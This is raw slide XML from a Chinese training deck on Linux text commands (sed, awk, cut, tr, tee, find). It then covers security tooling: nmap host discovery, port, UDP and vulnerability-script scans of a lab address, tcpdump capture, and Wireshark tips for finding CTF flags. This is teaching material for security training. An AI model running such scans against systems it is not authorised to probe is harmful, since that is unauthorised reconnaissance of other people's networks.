                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>词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-sed-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52489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查找指定文件中带有某个关键词的行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cat -n 1.txt | sed -n '/root/p'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将指定文件中某个关键词替换成大写形式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sed 's/root/ROOT/g' 1.txt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读取指定文件，删除所有带有某个关键词的行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     sed '/root/d' 1.txt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读取指定文件，在第4行后插入一行新内容  sed -e 4a\NewLine File.cfg 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读取指定文件，删除第2～5行的内容  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sed '2,5c NewSentence' File.cfg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读取指定文件，替换第2～5行的内容   sed '2,5c NewSentence' File.cfg  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读取指定文件的第3～7行  sed -n '3,7p' File.cfg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awk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awk命令来自三位创始人Alfred Aho、Peter Weinberger、Brian Kernighan的姓氏缩写，其功能是对文本和数据进行处理。使用awk命令可以让用户自定义函数或正则表达式，对文本内容进行高效管理，awk与sed、grep并称为Linux系统中的“文本三剑客”。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lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>awk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参数 文件名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10340340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/>
                <a:gridCol w="3235325"/>
                <a:gridCol w="2073910"/>
                <a:gridCol w="336042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使用兼容</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>模式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显示版权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</a:tr>
              <a:tr h="572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指定源码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从脚本中读取</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>awk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>命令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设置输入时的字符分割</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>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v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自定义变量</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>信息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识别输入数据中的八进制和十六进制数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O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启用程序优化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-awk-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内置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40385" y="2087245"/>
          <a:ext cx="10340340" cy="228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/>
                <a:gridCol w="3235325"/>
                <a:gridCol w="2073910"/>
                <a:gridCol w="336042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变量名称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变量</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>名称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349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ARGC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命令行参数个数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ARGV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命令行参数排列</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="572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ENVIRON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指定源码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FILENAME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sz="1600"/>
                        <a:t>awk浏览的文件名</a:t>
                      </a:r>
                      <a:endParaRPr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FNR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浏览文件的记录数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OFS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输出域分隔符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ORS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输出记录分隔符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RS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控制记录分隔符</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="3416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FS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设置输入域分隔符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NF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浏览记录域的个数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awk-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609090"/>
            <a:ext cx="11031220" cy="52489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仅显示指定文件中第1、2列的内容（默认以空格为间隔符）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awk '{print $1,$2}' File.cfg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以冒号为间隔符，仅显示指定文件中第1列的内容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awk -F : '{print $1}' /etc/passwd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以冒号为间隔符，显示系统中所有UID号码大于500的用户信息（第3列）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   awk '/root/{print}' File.cfg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以冒号为间隔符，仅显示指定文件中最后一个字段的内容  awk -F : '{print $NF}'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paste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paste命令来自英文单词“粘贴”，其功能是用于合并两个文件。paste命令能够将两个文件以列对列的方式进行合并，相当于是把两个不同的文件内容粘贴到了一起，形成新的文件，如需先将内容合并成一行，再以行粘贴的方式合并，可以用-s参数搞定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sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>paste [参数] 文件名1 文件名2</a:t>
            </a:r>
            <a:endParaRPr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8101330" cy="244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1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设置自定义</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>间隔符</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="720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将每个文件粘贴成一行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--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从标准输入中读取数据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-paste-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52489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现有两个文件（File1，File2），对其进行合并操作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paste File1 File2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设置合并后内容的分隔符，再进行合并操作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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>paste -d: File1 File2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设置每个文件内容为一行，再进行合并操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  paste -s File1 File2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-cut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cut命令的功能是按列提取文件内容。常用的grep命令仅能对关键词进行按行提取过滤，而cut命令则可以根据指定的关键词信息，针对特定的列内容进行过滤。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sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cut 参数 文件名</a:t>
            </a:r>
            <a:endParaRPr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810133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1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-b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以字节为单位进行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>分割</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="720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以字符为单位进行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>分割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设置分割</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>符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显示指定字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>内容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n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取消分割多字节</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>字符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-cut-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169418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以冒号为间隔符，仅提取指定文件中第一列的内容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cut -d : -f 1 /etc/passwd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仅提取指定文件中每行的前4个字符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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> cut -c 1-4 /etc/passwd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02122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>仅提取指定文件中每行的前4个字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> cut -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>b 1-4 1.txt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tr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270" y="167005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tr命令来自英文单词transform的缩写，中文译为“转换”，其功能是转换字符。tr命令是一款批量字符转换、压缩、删除的文本工具，但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仅能从标准输入中读取文本内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，需要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与管道符或输入重定向操作符搭配使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tr 参数 字符串1 字符串2</a:t>
            </a:r>
            <a:endParaRPr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810133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1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反选字符串1的补集</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="720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删除字符串1中出现的所有字符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将连续的相同字符（空格、制表符或换行符）替换为单个字符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将字符串1截断为字符串2的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长度</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>(将输入中的一个字符替换为另一个字符)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN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-tr-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21120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将指定文件中的小写字母转换成大写字母后输出内容到终端界面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tr [a-z] [A-Z] &lt; File.cfg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删除指定文件中所有的数字后输出内容到终端界面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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> tr -d [0-9] &lt; File.cfg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202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将指定文件中的多个相邻空行去重后输出内容到终端界面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> tr -s "[\n]" &lt; File.cfg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:sym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+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将中国替换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>China	 tr  -t '中国' 'china'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:sym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latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>删除空行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	tr -s '\n' '\n'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:sym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1600" i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3924300"/>
            <a:ext cx="2279650" cy="2273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60750" y="4778375"/>
            <a:ext cx="2404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-s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-t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的区别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tee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tee命令的功能是用于读取标准输入的数据，将其内容转交到标准输出设备中，同时保存成文件。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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tee [参数] 文件名</a:t>
            </a:r>
            <a:endParaRPr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en-US" altLang="zh-CN" sz="1600" i="0"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9270" y="3209925"/>
          <a:ext cx="810133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1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-a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追加写入操作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-tee-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>练习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1694180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将用户输入的数据同时写入到两个文件中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tee File1 File2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执行某个指定的命令，并将其执行结果即输出到屏幕，又写入到文件中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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> uptime | tee File.txt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常用工具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端口扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>nmap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8556625" cy="516953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0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主机发现</a:t>
            </a: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  nmap -sn 192.168.56.0/24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端⼝扫描  nmap -sT --min-rate 10000 -p- 192.168.56.110 -oA nmapscan/ports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端⼝数据格式化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grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ','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ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')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echo $ports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详细信息扫描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sudo nmap -sT -sV -sC -O -p80,111,777 192.168.56.110 -oA nmapscan/info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udp扫描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sudo nmap -sU -p- 192.168.56.110 -oA nmapscan/udp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漏洞脚本扫描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</a:rPr>
              <a:t>sudo nmap --script=vuln -p80,111,777 192.168.56.110 -oA nmapscan/vuln</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea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15220" y="2977515"/>
          <a:ext cx="90360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03605" imgH="451485" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="" r:id="rId1" imgW="903605" imgH="45148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15220" y="2977515"/>
                        <a:ext cx="90360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端口扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-nmap-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>script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7825" y="1124585"/>
            <a:ext cx="10894060" cy="5597525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脚本分类：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auth：这类脚本涉及认证相关的检查，例如尝试登录服务以确定凭据的需求。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broadcast：这些脚本通过发送广播请求来发现网络上的服务和设备。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brute：用于暴力破解尝试，比如尝试不同的密码组合来获得访问权限。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default：这是Nmap默认运行的脚本集合，通常包括一些基本的服务发现和信息收集脚本。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discovery：用于网络发现，例如确定网络中的主机和开放的端口。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dos：涉及拒绝服务攻击的脚本，这些脚本可能会对目标系统造成影响。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exploit：这类脚本包含利用已知漏洞的攻击代码，用于渗透测试。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external：依赖外部数据库或服务的脚本，例如whois查询。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fuzzer：用于模糊测试的脚本，通过发送异常或随机数据包来发现潜在的漏洞。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intrusive：可能被认为是侵入性的脚本，因为它们可能会触发入侵检测系统或对目标系统造成影响。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malware：用于检测系统中可能存在的恶意软件或僵尸网络的脚本。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safe：在所有情况下都被认为是安全的脚本，不会对目标系统造成损害。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version：用于版本检测的脚本，可以识别运行在开放端口上的服务及其版本信息。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lvl="1"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vuln：用于检测特定已知漏洞的脚本。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indent="0" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用方法：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-sC  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>相当于</a:t>
            </a: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 --script=default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  <a:p>
            <a:pPr indent="0" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>nmap --script http-trace --script-args='url="http://target_host"'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="202122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find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find命令的功能是根据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给定的路径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和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条件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相关文件或目录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，其参数灵活方便，且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支持正则表达式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，结合管道符后能够实现更加复杂的功能，是Linux系统运维人员必须掌握的命令之一。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solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语法格式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：find 路径 条件 文件名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常用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参数：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lang="zh-CN" altLang="en-US" sz="1600" i="0">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill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34035" y="3479800"/>
          <a:ext cx="1030351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970"/>
                <a:gridCol w="3223260"/>
                <a:gridCol w="2066925"/>
                <a:gridCol w="334835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-name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匹配文件名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type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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>类型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-perm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匹配文件权限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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>大小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-user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匹配文件所属主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-exec…… {}\;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进一步处理搜索</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>结果</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US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-group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匹配文件所属组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zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>newer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匹配比指定文件更新的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-mtime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匹配最后修改文件内容时间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-nouser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匹配无所属主的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</a:tr>
              <a:tr h="4070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-atime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匹配最后</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>读取文件内容时间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-nogroup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匹配无所属组的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>文件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-ctime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匹配最后修改文件</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>属性时间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...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...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端口扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-nmap-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>script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20180417083950-d68f4ba0-41d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965" y="1199515"/>
            <a:ext cx="9171305" cy="53555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流量捕获</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tcpdump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6555" y="1363345"/>
            <a:ext cx="10367645" cy="301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TCPDump可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息。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用简单的话来定义tcpdump，就是：dump the traffic on a network，根据使用者的定义对网络上的数据包进行截获的包分析工具。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作为互联网上经典的的系统管理员必备工具，tcpdump以其强大的功能，灵活的截取策略，成为每个高级的系统管理员分析网络，排查问题等所必备的工具之一。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>tcpdump提供了源代码，公开了接口，因此具备很强的可扩展性，对于网络维护和入侵者都是非常有用的工具。tcpdump存在于基本的 FreeBSD系统中，由于它需要将网络接口设置为混杂模式，普通用户不能正常执行，但具备root权限的用户可以直接执行它来获取网络上的信息。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流量捕获</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-tcpdump-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用法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6555" y="1363345"/>
            <a:ext cx="6003290" cy="2719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捕获所有经过指定网络接口的数据包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	tcpdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>捕获特定数量的数据包	tcpdump -c 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>将捕获的数据包写入文件	tcpdump -w capture_file.pcap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>从文件中读取数据包	tcpdump -r capture_file.pcap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捕获特定主机的数据包	tcpdump host &lt;IP_ADDR&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>捕获特定网络的数据包	tcpdump net 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>捕获特定端口的数据包	tcpdump port 80</a:t>
            </a:r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263005" y="2520950"/>
            <a:ext cx="5928995" cy="42005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流量分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>wireshark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894060" cy="147891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Wireshark是一个开源的网络数据包分析器，可实时从网络接口捕获数据包中的数据。它尽可能详细地显示捕获的数据以供用户检查它们的内容，并支持多协议的网络数据包解析。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Wireshark 适用于Windows 和 UNIX 操作系统。它可被用于检查安全问题和解决网络问题，也可供开发者调试协议的实现和学习网络协议的原理。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106930" y="2736850"/>
            <a:ext cx="6503670" cy="384238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流量分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Wireshark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小技巧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825" y="1687195"/>
            <a:ext cx="9716770" cy="37141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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>统计 -》 协议分级</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607"/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2242185"/>
            <a:ext cx="10073005" cy="293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vortex dir="r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流量分析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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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小技巧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825" y="1687195"/>
            <a:ext cx="9716770" cy="37141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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>统计 -</a:t>
            </a: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&gt;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会话</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pP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3.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统计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 -&gt; HTTP -&gt;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请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607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2703195"/>
            <a:ext cx="5763260" cy="355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vortex dir="r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流量分析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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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小技巧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825" y="1687195"/>
            <a:ext cx="9716770" cy="37141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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>搜索的时候，先选择“分组字节流”，然后再进行字符串查找</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607"/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226310"/>
            <a:ext cx="6330315" cy="423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vortex dir="r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流量分析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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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小技巧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825" y="1687195"/>
            <a:ext cx="9716770" cy="37141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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在分组字节流中，右键“显示分组字节”，可以对字节进行一些常见解码</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607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1825" y="2373630"/>
            <a:ext cx="10003790" cy="294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vortex dir="r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流量分析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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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小技巧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825" y="1687195"/>
            <a:ext cx="9716770" cy="371411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sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6. 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直接搜索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“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ZmxhZw==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”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“666c6167 ”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
